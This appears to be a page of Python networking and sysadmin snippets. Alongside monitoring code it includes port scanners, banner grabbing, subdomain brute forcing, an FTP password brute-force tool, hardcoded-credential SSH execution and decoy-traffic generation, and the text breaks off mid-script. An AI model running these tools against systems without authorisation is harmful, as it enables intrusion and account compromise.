print("IO per network interface: {}".format(psutil.net_io_counters(pernic=True)))
print("-"*50)
print("Process list: {}".format(psutil.pids()))
process = psutil.Process(0)  # process 0; use a PID from psutil.pids() if it does not exist on your system
print("Process name: {}".format(process.name()))
print("Thread count: {}".format(process.num_threads()))
print("Process status: {}".format(process.status()))
# print("Process UID:{} GID:{}".format(process.uids,process.gids))
print("Memory usage percent: {}".format(process.memory_percent()))
print("Process sockets: {}".format(process.connections()))
A simple HTTP server: a web application is essentially a socket server, and the user's browser is a socket client. Below is a minimal HTTP server.
import socket

def handle_request(client):
    buf = client.recv(1024)
    # a blank line (\r\n\r\n) separates the headers from the body
    client.send(bytes("HTTP/1.1 200 OK\r\n\r\n","UTF-8"))
    client.send(bytes("<b>Hello lyshark</b>","UTF-8"))

def main():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind(("localhost",80))
    sock.listen(5)
    while True:
        connection, address = sock.accept()
        handle_request(connection)
        connection.close()

if __name__ == "__main__":
    main()
A simple password login check: verify passwords without a database. The stored MD5 hash corresponds to the password 123123.
import os,time
import hashlib

# Flag counts failed attempts; it is kept as an integer so comparisons are numeric
db = [
    {"user":"admin","pass":"4297f44b13955235245b2497399d7a93","Flag":0},
    {"user":"guest","pass":"4297f44b13955235245b2497399d7a93","Flag":0},
    {"user":"lyshark","pass":"4297f44b13955235245b2497399d7a93","Flag":0}
]

def CheckUser(username,password):
    for entry in db:
        if entry["user"] == username:
            if entry["Flag"] < 5:
                digest = hashlib.md5(password.encode("utf-8")).hexdigest()
                if entry["pass"] == digest:
                    entry["Flag"] = 0  # reset the counter on success
                    return 1
                else:
                    entry["Flag"] += 1
                    return 0
            else:
                print("User {} is permanently locked out".format(entry["user"]))
                return 0
    return 0

while True:
    username = input("Username: ")
    password = input("Password: ")
    ret = CheckUser(username,password)
    print("Login status:",ret)
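Unsalted MD5 is fine for a demonstration but weak for real password storage. The sketch below shows one common alternative using only the standard library: a salted PBKDF2 hash, compared in constant time. The function names and the round count are my own choices for illustration:

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None, rounds=100_000):
    """Return (salt, digest) for password using PBKDF2-HMAC-SHA256."""
    if salt is None:
        salt = os.urandom(16)  # a fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return salt, digest

def verify_password(password, salt, digest, rounds=100_000):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison

salt, digest = hash_password("123123")
print(verify_password("123123", salt, digest))  # True
print(verify_password("wrong", salt, digest))   # False
```

Each user record would then store the salt and the digest instead of a bare MD5 string.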
Traffic statistics for a web server: total the traffic per client in a web server log, for example all traffic from 192.168.1.10.
import os,sys

def Count_IP_And_Flow(file):
    addr = {}   # IP -> number of requests
    flow = {}   # IP -> total bytes
    Count = 0   # running total of bytes across all IPs
    with open(file) as f:
        contexts = f.readlines()
    for line in contexts:
        if line.split()[9] != "-" and line.split()[9] != '"-"':
            size = line.split()[9]
            ip_attr = line.split()[0]
            Count = int(size) + Count
            if ip_attr in addr.keys():
                addr[ip_attr] = addr[ip_attr] + 1
                flow[ip_attr] = flow[ip_attr] + int(size)
            else:
                addr[ip_attr] = 1
                flow[ip_attr] = int(size)
    return addr,flow

if __name__ == "__main__":
    Address,OutFlow = Count_IP_And_Flow("c://access.log")
    print("Request counts: {} ---> Traffic totals: {}".format(Address,OutFlow))
Status code statistics for a web server: count the status codes in a web server log, for example how often 404 appears.
import os,sys

def Count_Flag_And_Flow(file):
    codes = []
    flag = {}
    with open(file) as f:
        contexts = f.readlines()
    for line in contexts:
        it = line.split()[8]
        codes.append(it)
    list_num = set(codes)
    for item in list_num:
        num = codes.count(item)
        print("Status code: {} --> count: {}".format(item,num))
        flag[item] = num
    return flag

if __name__ == "__main__":
    Address = Count_Flag_And_Flow("c://access.log")
    print("Status code counts: {} ".format(Address))
Listing the host IPs in a given range:
import os

def CalculationIP(Addr_Count):
    ret = []
    try:
        IP_Start = str(Addr_Count.split("-")[0]).split(".")
        IP_Heads = str(IP_Start[0] + "." + IP_Start[1] + "." + IP_Start[2] + ".")
        IP_Start_Range = int(Addr_Count.split(".")[3].split("-")[0])
        IP_End_Range = int(Addr_Count.split("-")[1])
        for item in range(IP_Start_Range,IP_End_Range+1):
            ret.append(IP_Heads+str(item))
        return ret
    except Exception:
        return []  # an empty list keeps the caller's loop safe

if __name__ == "__main__":
    ret = CalculationIP("192.168.1.10-200")
    for item in ret:
        print("IP in range: {}".format(item))
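As a sketch of the same idea with validation, the standard-library ipaddress module rejects malformed addresses instead of silently producing bad strings. expand_range is a hypothetical helper that accepts the same a.b.c.d-N format:

```python
import ipaddress

def expand_range(spec):
    """Expand 'a.b.c.d-N' into the list of addresses from a.b.c.d to a.b.c.N."""
    start_text, _, end_text = spec.partition("-")
    start = ipaddress.IPv4Address(start_text)   # raises ValueError on a bad address
    last = int(end_text)
    if not 0 <= last <= 255:
        raise ValueError("end of range must be between 0 and 255")
    end = ipaddress.IPv4Address((int(start) & 0xFFFFFF00) | last)
    if end < start:
        raise ValueError("end of range is below its start")
    return [str(ipaddress.IPv4Address(n)) for n in range(int(start), int(end) + 1)]

addresses = expand_range("192.168.1.10-12")
print(addresses)  # ['192.168.1.10', '192.168.1.11', '192.168.1.12']
```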
PHP function scanner: quickly scan PHP files for dangerous functions. It can be used for vulnerability hunting and for finding one-line webshells.
# coding=gbk
import sys,os,re

def spider(script_path,script_type):
    final_files = []
    for root, dirs, files in os.walk(script_path, topdown=False):
        for fi in files:
            dfile = os.path.join(root, fi)
            if dfile.endswith(script_type):
                final_files.append(dfile.replace("\\","/"))
    print("[+] Found {} PHP files".format(len(final_files)))
    return final_files

def scanner(files_list,func):
    for item in files_list:
        with open(item, "r",encoding="utf-8") as fp:
            data = fp.readlines()
        # enumerate gives the true line number; data.index(line) returned the
        # first match and so misreported duplicate lines
        for Code_line, line in enumerate(data, start=1):
            Now_code = line.strip("\n")
            #for unsafe in ["system", "insert", "include", "eval","select *"]:
            for unsafe in [func]:
                flag = re.findall(unsafe, Now_code)
                if len(flag) != 0:
                    print("Function: {} ---> line: {} ---> path: {} ".format(flag,Code_line,item))

if __name__ == "__main__":
    path = sys.argv[1]
    func = sys.argv[2]
    ret = spider(path,".php")
    scanner(ret,func)
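SQL statement monitoring: watch the SQL statements MySQL executes through its log file. Two options must be enabled first for this to work: SET GLOBAL general_log='ON'; SET GLOBAL general_log_file='C:/mysql.log'
import re

try:
    with open("C:/mysql.log","r") as fp:
        sql = fp.readlines()
    for item in sql:
        # the separator was lost in the source; a tab is assumed here,
        # since the general log separates its columns with tabs
        temp = item.replace("\n","").split("\t")
        if len(temp) > 2 and re.search("Connect",temp[1]) is None and temp[2] != "":
            print("Status: {} ---> Statement: {}".format(temp[1],temp[2]))
    open("C:/mysql.log","w").close()  # truncate the log once it has been read
except Exception:
    open("C:/mysql.log", "w").close()
    exit()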
A simple port scan
import socket

for ip in range(1,255):
    # a socket cannot be reused after a connect attempt, so create one per host
    sk = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sk.settimeout(1)
    try:
        sk.connect(("192.168.1."+str(ip),443))
        print("192.168.1.%d server open" % ip)
    except Exception:
        print("192.168.1.%d server not open" % ip)
    finally:
        sk.close()
A second simple port scan.
import socket

def PortScan(ip, port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.connect((ip, port))
        print('{0} port {1} is open'.format(ip, port))
    except Exception as err:
        print('{0} port {1} is not open'.format(ip, port))
    finally:
        server.close()

if __name__ == '__main__':
    host = '192.168.1.1'
    for port in range(50, 1000):
        PortScan(host, port)

import socket

port_number = [135,443,80]
for index in port_number:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # connect_ex returns 0 on success instead of raising an exception
    result = sock.connect_ex(('127.0.0.1', index))
    if result == 0:
        print("Port %d is open" % index)
    else:
        print("Port %d is not open" % index)
    sock.close()
Both approaches above run serially, which is very slow across many IPs and ports, so we bring in the threading module.
import threading
import socket

def PortScan(ip, port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.connect((ip, port))
        print('{0} port {1} is open'.format(ip, port))
    except Exception as err:
        print('{0} port {1} is not open'.format(ip, port))
    finally:
        server.close()

if __name__ == '__main__':
    host = '192.168.1.1'
    threads = []
    for port in range(20, 100):
        t = threading.Thread(target=PortScan, args=(host, port))
        t.start()
        threads.append(t)
    for t in threads:
        t.join()
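Starting one thread per port becomes unwieldy for large ranges. A sketch with a bounded thread pool from concurrent.futures, which caps the number of simultaneous connections and returns the open ports instead of printing them. The is_open and scan names, the timeout and the worker count are my own choices:

```python
import socket
from concurrent.futures import ThreadPoolExecutor

def is_open(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0

def scan(host, ports, workers=32):
    """Check the ports with at most `workers` threads and return the open ones."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda p: is_open(host, p), ports)
        return [p for p, ok in zip(ports, results) if ok]

# Usage, against a host you are allowed to scan:
# print(scan("192.168.1.1", range(20, 100)))
```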
A simple batch ping
import multiprocessing
import sys,subprocess

def ping(ip):
    # -w and -n are the Windows ping flags
    ret = subprocess.call("ping -w 500 -n 1 %s" %ip,stdout=subprocess.PIPE,shell=True)
    if ret == 0:
        hproc = subprocess.getoutput("ping "+ip)
        # "平均 = " is the "Average = " label printed by ping on Chinese-language Windows
        delay = hproc.split("平均 = ")[1]
        print("Latency: {} Host: {}".format(delay,ip))
    else:
        print("Latency: {} Host: {}".format("None", ip))

if __name__ == "__main__":
    with open("ip.log","r") as f:
        for i in f:
            ip = i.strip()  # drop the trailing newline
            if ip:
                p = multiprocessing.Process(target=ping,args=(ip,))
                p.start()
Fetching a target site's web server information
import os
import requests
import re

head={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}

def GetTitle(domain):
    try:
        url="https://{}".format(domain)
        ret = requests.get(url=url,headers=head,timeout=1)
        title = re.findall("<title>.*</title>",ret.content.decode("utf-8"))
        print("Page title: {}".format(str(title[0]).replace("<title>","").replace("</title>","")))
        # .get() returns None when a header is absent, so the remaining lines still print
        print("Server time: {}".format(ret.headers.get("Date")))
        print("Web server: {}".format(ret.headers.get("Server")))
        print("Compression: {}".format(ret.headers.get("Content-Encoding")))
        print("Cxy_all: {}".format(ret.headers.get("Cxy_all")))
        print("Traceid: {}".format(ret.headers.get("Traceid")))
    except Exception:
        pass

if __name__ == "__main__":
    GetTitle("baidu.cn")
Getting a target site's IP address
import os
import socket
import re

def GetIPAddress(domain):
    try:
        sock = socket.getaddrinfo(domain,None)
        ip = str(sock[0][4])
        # escape the dot so that it matches only a literal "."
        result = re.findall(r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}", ip)
        print(result[0])
    except Exception:
        pass

if __name__ == "__main__":
    GetIPAddress("www.163.com")
Subdomain brute forcing: enumerate a site's subdomains, such as www, from a wordlist.
import os
import requests
import re

head={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}

def VisitWeb(prefix,domain):
    try:
        url = "https://{}.{}".format(prefix,domain)
        ret = requests.get(url=url, headers=head, timeout=1)
        if ret.status_code == 200:
            return 1
        else:
            return 0
    except Exception:
        return 0

def BlastWeb(domain,wordlist):
    with open(wordlist,"r") as fp:
        for line in fp:
            main = line.strip()
            if not main:
                continue  # skip blank lines
            if VisitWeb(main, domain) != 0:
                print("Subdomain: {}.{} exists".format(main,domain))

if __name__ == "__main__":
    BlastWeb("baidu.com","./list.log")
FTP password brute-force tool: you can add multithreading yourself to speed it up.
import ftplib

def Brutelogin(hostname,username,wordlist):
    with open(wordlist,"r") as fp:
        for line in fp:
            password = line.strip("\r\n")
            print("[+] Host:{} User:{} Paswd:{}".format(hostname,username,password))
            try:
                ftp = ftplib.FTP(hostname)
                ftp.login(username,password)
                print("\n[*] {} Login Succeeded.".format(password))
                ftp.quit()
                return (username,password)  # stop at the first working password
            except Exception:
                pass
    print("\n[-] Could not brute force FTP credentials.")
    return (None,None)

Brutelogin("192.168.1.20","admin","./list.log")
A simple Baidu results crawler
import sys,os,re
import requests
from bs4 import BeautifulSoup

head = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"}
#url = "https://www.baidu.com/s?wd=lyshark&pn=0"
url = "http://192.168.1.2/bd/"
ret = requests.get(url=url,headers=head)
soup = BeautifulSoup(ret.content,'lxml')
urls = soup.find_all(name='a',attrs={'data-click':re.compile(('.')),'class':None})
for item in urls:
    get_url = requests.get(url=item['href'],headers=head,timeout=5)
    if get_url.status_code == 200:
        print(get_url.url)
A dynamic progress bar
import time

def process_bar(percent, end_str=''):
    # "\r" moves the cursor back to the start of the line, so each call overwrites the previous one
    bar = '\r' + '[ {:d} | '.format(int(percent)) + end_str + " ]"
    print(bar, end='', flush=True)

for i in range(101):
    time.sleep(0.1)
    end_str = '100'
    process_bar(i, end_str=end_str)
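The drawing part can be separated from the printing part, which makes the bar easier to check. A minimal sketch, assuming an integer percentage; `render_bar` and its `width` parameter are names invented for this example.

```python
def render_bar(percent, width=20):
    """Build the text of a progress bar for an integer percentage."""
    percent = max(0, min(100, percent))        # clamp to 0..100
    filled = width * percent // 100            # number of '#' cells
    return "[{}{}] {:3d}%".format("#" * filled, "." * (width - filled), percent)

# Redraw on one line by prefixing each frame with a carriage return
for value in (0, 50, 100):
    print("\r" + render_bar(value, width=10), end="", flush=True)
print()
```

Since `render_bar` only returns a string, the same function can feed a log file or a GUI label as well as the terminal.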
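A simple batch ping
import multiprocessing
import subprocess

def ping(ip):
    # -n 1 / -w 500 are the Windows ping flags: one echo request, 500 ms timeout
    ret = subprocess.call("ping -w 500 -n 1 %s" % ip, stdout=subprocess.PIPE, shell=True)
    if ret == 0:
        hproc = subprocess.getoutput("ping " + ip)
        # "平均 = " is the "Average = " label printed by ping on a Chinese-locale Windows
        delay = hproc.split("平均 = ")[1]
        print("Latency: {} Host: {}".format(delay, ip))
    else:
        print("Latency: {} Host: {}".format("None", ip))

if __name__ == "__main__":
    with open("ip.log", "r") as f:
        for line in f:
            ip = line.strip()       # drop the trailing newline
            if not ip:
                continue
            p = multiprocessing.Process(target=ping, args=(ip,))
            p.start()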
Scanning target hosts for banners: to give the printing code exclusive control of the screen, a semaphore is used here. It keeps other threads from printing at the same time, which avoids garbled or out-of-order output.
#coding=utf-8
from socket import *
from threading import *

# Define a semaphore with a single slot
screenLock = Semaphore(value=1)

def ScanBanner(addr, port):
    conn = socket(AF_INET, SOCK_STREAM)
    try:
        conn.connect((addr, port))
        conn.send(bytes("hello lyshark\r\n", encoding="utf-8"))
        res = conn.recv(200)
        # Hold the lock while printing; it is released when the block exits
        with screenLock:
            print("[+] Host: {} Banner: {}".format(addr, res))
    except Exception:
        with screenLock:
            print("[-] Host: {} does not exist or is closed.".format(addr))
    finally:
        conn.close()

setdefaulttimeout(1)
for i in range(0, 25):
    a = "192.168.1.{}".format(i)
    t = Thread(target=ScanBanner, args=(a, 80))
    t.start()
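The locking idea can be tried without touching the network. In this small sketch (the `report` function and the `lines` list are made up for the demo) each thread takes the lock before it prints, so no two lines can interleave.

```python
import threading

print_lock = threading.Lock()
lines = []

def report(worker_id):
    # Only one thread at a time may execute the body of this block
    with print_lock:
        line = "[+] worker {} done".format(worker_id)
        lines.append(line)
        print(line)

threads = [threading.Thread(target=report, args=(i,)) for i in range(5)]
for t in threads:
    t.start()
for t in threads:
    t.join()
```

A `Semaphore(value=1)` behaves the same way here; `Lock` is just the more common spelling when only one holder is ever allowed.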
Ping with scapy
from scapy.all import *
from random import randint
import ipaddress, threading

def ping(host):
    RandomID = randint(1, 65534)
    packet = IP(dst=host, ttl=64, id=RandomID) / ICMP(id=RandomID, seq=RandomID) / b"lyshark"
    respon = sr1(packet, timeout=3)
    if respon:
        print(str(respon[IP].src))

if __name__ == '__main__':
    threads = []
    net = ipaddress.ip_network("192.168.1.0/24")
    for item in net:
        # Pass the function itself (not its return value) to the thread,
        # and give scapy the address as a string
        t = threading.Thread(target=ping, args=(str(item),))
        threads.append(t)
        t.start()
    for t in threads:
        t.join()
Web server identification
import requests
from bs4 import BeautifulSoup

header = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'}

def GetServerTitle(url):
    Respon = requests.get(url=url, headers=header, timeout=5)
    print("--" * 50)
    print(url + " ", end="")
    if Respon.status_code == 200:
        RequestBody = [item for item in Respon.headers]
        # Print the headers that usually reveal the server software
        for item in ["Date", "Server", "X-Powered-By"]:
            if item in RequestBody:
                print(Respon.headers[item] + " ", end="")
            else:
                print("None" + " ", end="")
        bs4 = BeautifulSoup(Respon.text, "html.parser")
        print(bs4.find_all("title")[0])
    print("--" * 50)

for i in range(1, 10):
    GetServerTitle("http://www.xxx.com")
Two ways to run SSH commands from multiple threads
import paramiko, datetime, threading

class MyThread(threading.Thread):
    def __init__(self, address, username, password, port, command):
        super(MyThread, self).__init__()
        self.address = address
        self.username = username
        self.password = password
        self.port = port
        self.command = command
        self.result = None

    def run(self):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            ssh.connect(self.address, port=self.port, username=self.username, password=self.password, timeout=1)
            stdin, stdout, stderr = ssh.exec_command(self.command)
            result = stdout.read()
            if not result:
                # Fall back to stderr when the command wrote nothing to stdout
                result = stderr.read()
            self.result = result.decode()
        except Exception:
            self.result = "0"
        finally:
            ssh.close()

    def get_result(self):
        return self.result

ThreadPool = []                 # list of worker threads
starttime = datetime.datetime.now()
for item in range(5):
    obj = MyThread("192.168.1.20", "root", "123", 22, "ifconfig")
    ThreadPool.append(obj)
for item in ThreadPool:
    item.start()                # start every thread first
for item in ThreadPool:
    item.join()                 # then wait for all of them, so they actually run concurrently
for item in ThreadPool:
    ret = item.get_result()     # fetch the result
    print(ret)
endtime = datetime.datetime.now()
print("Started: {} Finished: {}".format(starttime, endtime))
The second way
import paramiko, datetime, threading

def ssh_shell(address, username, password, port, command):
    # One client per call: a single shared SSHClient cannot be reconnected safely from several threads
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(address, port=port, username=username, password=password, timeout=1)
        stdin, stdout, stderr = ssh.exec_command(command)
        result = stdout.read()
        if not result:
            result = stderr.read()
        return result.decode()
    except Exception:
        return "0"
    finally:
        ssh.close()

class MyThread(threading.Thread):
    def __init__(self, func, args=()):
        super(MyThread, self).__init__()
        self.func = func
        self.args = args
        self.result = None

    def run(self):
        self.result = self.func(*self.args)

    def get_result(self):
        return self.result

ThreadPool = []                 # list of worker threads
starttime = datetime.datetime.now()
for item in range(10):
    obj = MyThread(func=ssh_shell, args=("192.168.1.20", "root", "123", 22, "pwd"))
    ThreadPool.append(obj)
for item in ThreadPool:
    item.start()
for item in ThreadPool:
    item.join()
for item in ThreadPool:
    ret = item.get_result()     # fetch the result
    print(ret)
endtime = datetime.datetime.now()
print("Started: {} Finished: {}".format(starttime, endtime))
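For what it's worth, the standard library's `concurrent.futures` can take over the bookkeeping that the `MyThread` class does by hand (start, join, collect results). This is a different technique from the two above, shown only as a sketch: `run_command` is a hypothetical stand-in that does not open any SSH connection, and the host list is made up.

```python
from concurrent.futures import ThreadPoolExecutor

def run_command(host):
    # Hypothetical stand-in for the real SSH call; it only echoes the host name
    return "result from {}".format(host)

hosts = ["192.168.1.{}".format(i) for i in range(20, 25)]

# map() runs the calls on worker threads and yields results in input order
with ThreadPoolExecutor(max_workers=5) as pool:
    results = list(pool.map(run_command, hosts))

for line in results:
    print(line)
```

Swapping the body of `run_command` for a real per-call SSH session would keep the rest unchanged.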
Web page probe: checks the health of a page
import pycurl, certifi
from io import BytesIO

headers = ['Accept:*/*', 'User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0']

def header_function(header_line):
    header_line = header_line.decode("utf-8")
    #print(header_line.split(":"))

class ex_response(object):
    def __init__(self, url):
        self.buffer = BytesIO()                                 # buffer for the response
        self.c = pycurl.Curl()                                  # create the curl handle
        self.c.setopt(pycurl.URL, url)                          # target URL
        self.c.setopt(pycurl.CAINFO, certifi.where())           # CA bundle used for certificate verification
        self.c.setopt(pycurl.WRITEDATA, self.buffer)
        self.c.setopt(pycurl.WRITEHEADER, self.buffer)
        self.c.setopt(pycurl.HTTPHEADER, headers)               # request headers
        self.c.setopt(pycurl.HEADERFUNCTION, header_function)   # callback for each response header line
        self.failed = False
        try:
            self.c.perform()
        except pycurl.error:
            # Release resources and remember the failure so getinfo() can bail out
            self.failed = True
            self.buffer.close()
            self.c.close()

    def getinfo(self):
        if self.failed:
            print("request failed")
            return
        h1 = self.c.getinfo(pycurl.HTTP_CODE)            # status code
        h2 = self.c.getinfo(pycurl.TOTAL_TIME)           # total time of the transfer
        h3 = self.c.getinfo(pycurl.NAMELOOKUP_TIME)      # DNS lookup time
        h4 = self.c.getinfo(pycurl.CONNECT_TIME)         # time to establish the connection
        h5 = self.c.getinfo(pycurl.PRETRANSFER_TIME)     # time until the transfer is about to begin
        h6 = self.c.getinfo(pycurl.STARTTRANSFER_TIME)   # time until the first byte is received
        h7 = self.c.getinfo(pycurl.REDIRECT_TIME)        # time spent on redirects
        h8 = self.c.getinfo(pycurl.SIZE_UPLOAD)          # bytes uploaded
        h9 = self.c.getinfo(pycurl.SIZE_DOWNLOAD)        # bytes downloaded
        h10 = self.c.getinfo(pycurl.SPEED_DOWNLOAD)      # average download speed
        h11 = self.c.getinfo(pycurl.SPEED_UPLOAD)        # average upload speed
        h12 = self.c.getinfo(pycurl.HEADER_SIZE)         # size of the HTTP headers
        info = '''
HTTP status code: %s
Total time: %.2f ms
DNS lookup time: %.2f ms
Connect time: %.2f ms
Pre-transfer time: %.2f ms
Start-transfer time: %.2f ms
Redirect time: %.2f ms
Upload size: %d bytes
Download size: %d bytes
Average download speed: %d bytes/s
Average upload speed: %d bytes/s
HTTP header size: %d bytes
''' % (h1, h2*1000, h3*1000, h4*1000, h5*1000, h6*1000, h7*1000, h8, h9, h10, h11, h12)
        print(info)
        self.buffer.close()
        self.c.close()

if __name__ == "__main__":
    curl_respon = ex_response("https://www.baidu.com")
    curl_respon.getinfo()
Intranet traffic obfuscation
import requests
import random
import time
import threading

header = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120'}
url = [
    "https://www.baidu.com",
    "https://voice.baidu.com/act/newpneumonia/newpneumonia/",
    "https://news.baidu.com/",
    "https://tieba.baidu.com/",
    "https://map.baidu.com/",
    "https://im.qq.com/"
]

def tstart():
    # Keep requesting a randomly chosen URL to generate background traffic
    while True:
        try:
            u = random.choice(url)
            Respon = requests.get(url=u, headers=header, timeout=1)
            if Respon.status_code == 200:
                print("{} ok".format(u))
            else:
                print("{} error".format(u))
        except Exception:
            pass

# Three identical worker threads
for _ in range(3):
    t = threading.Thread(target=tstart)
    t.start()
psutil: use this module to enumerate system information.
import psutil

# Per-interface inbound and outbound traffic counters
def GetNetwork():
    network = psutil.net_io_counters(pernic=True, nowrap=True)
    for each in network.keys():
        print("[*] NIC: %-35s bytes sent/received: %s/%s packets sent/received: %s/%s"
              % (each, network[each].bytes_sent, network[each].bytes_recv,
                 network[each].packets_sent, network[each].packets_recv))

# Current network connections; kind can be tcp tcp4 tcp6 udp inet4 inet6
def GetNetworkLink():
    network = psutil.net_connections(kind="tcp")
    AllowData = []
    for each in network:
        src_addr, src_port = each.laddr.ip, each.laddr.port
        src_stats = each.status
        src_pid = each.pid
        # pid can be None when the owning process is not visible to this user
        if src_stats in ["ESTABLISHED", "LISTEN"] and src_pid is not None:
            process = psutil.Process(src_pid)
            print("[+] IP address: %15s:%-5s PID: %5s Name: %-10s"
                  % (src_addr, src_port, src_pid, process.name()))
            AllowData.append([process.name(), src_port])
    return AllowData

# Walk every PID in the system and print the key data of each process
def GetProcessID():
    for each in psutil.pids():
        try:
            p = psutil.Process(int(each))
            print("-" * 100)
            print("Process: %25s Threads: %5s Memory usage: %3s Created: %-20s"
                  % (p.name(), p.num_threads(), int(p.memory_percent()), p.create_time()))
            print("-" * 100)
            print("CPU times: {}".format(p.cpu_times()))
            print("Memory info: {}".format(p.memory_info()))
            print("Process I/O counters: {}".format(p.io_counters()))
            print("Process sockets: {}".format(p.connections()))
            print("\n" * 100)
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            # The process exited or is not accessible to this user
            continue
The following snippets were collected from the web and saved here for reference.
In [25]: import psutil
In [26]: from pprint import pprint as pp
# Look up process names and PIDs by process name
In [27]: pp([p.info for p in psutil.process_iter(attrs=['pid','name']) if 'python
...: ' in p.info['name']])
[{'name': 'ipython3', 'pid': 2429}]
In [28]: pp([p.info for p in psutil.process_iter(attrs=['pid','name']) if 'mysql'
...: in p.info['name']])
[{'name': 'mysqld_safe', 'pid': 987}, {'name': 'mysqld', 'pid': 1265}]
# All processes owned by the current user
In [32]: import getpass
In [33]: pp([(p.pid,p.info['name']) for p in psutil.process_iter(attrs=['name','u
...: sername']) if p.info['username'] == getpass.getuser()])
[(1, 'systemd'),
(2, 'kthreadd'),
(3, 'ksoftirqd/0'),
(5, 'kworker/0:0H'),
(6, 'kworker/u256:0'),
...
(5004, 'kworker/0:0')]
# Processes that are actively running
In [37]: pp([(p.pid,p.info) for p in psutil.process_iter(attrs=['name','status'])
...: if p.info['status'] == psutil.STATUS_RUNNING])
[(2429, {'name': 'ipython3', 'status': 'running'})]
# Processes that have log files open
In [38]: import os,psutil
In [39]: for p in psutil.process_iter(attrs=['name','open_files']):
...: for file in p.info['open_files'] or []:
...: if os.path.splitext(file.path)[1] == '.log':
...: print("%-5s %-10s %s" % (p.pid,p.info['name'][:10],file.path
...: ))
...:
auditd /var/log/audit/audit.log
vmtoolsd /var/log/vmware-vmsvc.log
tuned /var/log/tuned/tuned.log
# Processes using more than 5 MB of memory
In [42]: pp([(p.pid,p.info['name'],p.info['memory_info'].rss) for p in psutil.pro
...: cess_iter(attrs=['name','memory_info']) if p.info['memory_info'].rss > 5
...: * 1024 * 1024])
[(1, 'systemd', 7118848),
(411, 'systemd-udevd', 6254592),
(712, 'polkitd', 13553664),
(716, 'abrtd', 5734400),
(724, 'VGAuthService', 6262784),
(725, 'vmtoolsd', 6426624),
(974, 'tuned', 19648512),
(1265, 'mysqld', 45268992),
(2204, 'sshd', 5726208),
(2429, 'ipython3', 37232640)]
# Top 3 processes by memory usage
In [43]: pp([(p.pid, p.info) for p in sorted(psutil.process_iter(attrs=['name', '
...: memory_percent']), key=lambda p: p.info['memory_percent'])][-3:])
[(974, {'memory_percent': 0.9451434561080659, 'name': 'tuned'}),
(2429, {'memory_percent': 1.7909847854955845, 'name': 'ipython3'}),
(1265, {'memory_percent': 2.177553778800572, 'name': 'mysqld'})]
# Top 3 processes by CPU time consumed
In [44]: pp([(p.pid, p.info['name'], sum(p.info['cpu_times'])) for p in sorted(ps
...: util.process_iter(attrs=['name', 'cpu_times']), key=lambda p: sum(p.info
...: ['cpu_times'][:2]))][-3:])
[(1265, 'mysqld', 13.93),
(2429, 'ipython3', 14.809999999999999),
(725, 'vmtoolsd', 16.74)]
# Top 3 processes by I/O
In [45]: pp([(p.pid, p.info['name']) for p in sorted(psutil.process_iter(attrs=['
...: name', 'io_counters']), key=lambda p: p.info['io_counters'] and p.info['
...: io_counters'][:2])][-3:])
[(2429, 'ipython3'), (725, 'vmtoolsd'), (1, 'systemd')]
# Top 3 processes by number of open file descriptors
In [46]: pp([(p.pid, p.info) for p in sorted(psutil.process_iter(attrs=['name', '
...: num_fds']), key=lambda p: p.info['num_fds'])][-3:])
[(377, {'name': 'systemd-journald', 'num_fds': 24}),
(1, {'name': 'systemd', 'num_fds': 43}),
(1307, {'name': 'master', 'num_fds': 91})]
watchdog: real-time monitoring of file and directory changes.
from watchdog.observers import Observer
from watchdog.events import *
import time

class FileEventHandler(FileSystemEventHandler):
    def __init__(self):
        FileSystemEventHandler.__init__(self)

    def on_moved(self, event):
        if event.is_directory:
            print("Directory {0} moved to {1}".format(event.src_path, event.dest_path))
        else:
            print("File {0} moved to {1}".format(event.src_path, event.dest_path))

    def on_created(self, event):
        if event.is_directory:
            print("Directory created: {0}".format(event.src_path))
        else:
            print("File created: {0}".format(event.src_path))

    def on_deleted(self, event):
        if event.is_directory:
            print("Directory deleted: {0}".format(event.src_path))
        else:
            print("File deleted: {0}".format(event.src_path))

    def on_modified(self, event):
        if event.is_directory:
            print("Directory modified: {0}".format(event.src_path))
        else:
            print("File modified: {0}".format(event.src_path))

if __name__ == "__main__":
    observer = Observer()
    event_handler = FileEventHandler()
    # The third argument enables recursive watching of subdirectories
    observer.schedule(event_handler, "Z:MyWeb", True)
    observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()
Python HTTP/HTTPS proxy forwarding
from wsgiref.simple_server import make_server
import requests

def RunServer(environ, start_response):
    start_response("200 OK", [('Content-Type', 'text/html;charset=utf-8')])
    rHost = environ["HTTP_HOST"]
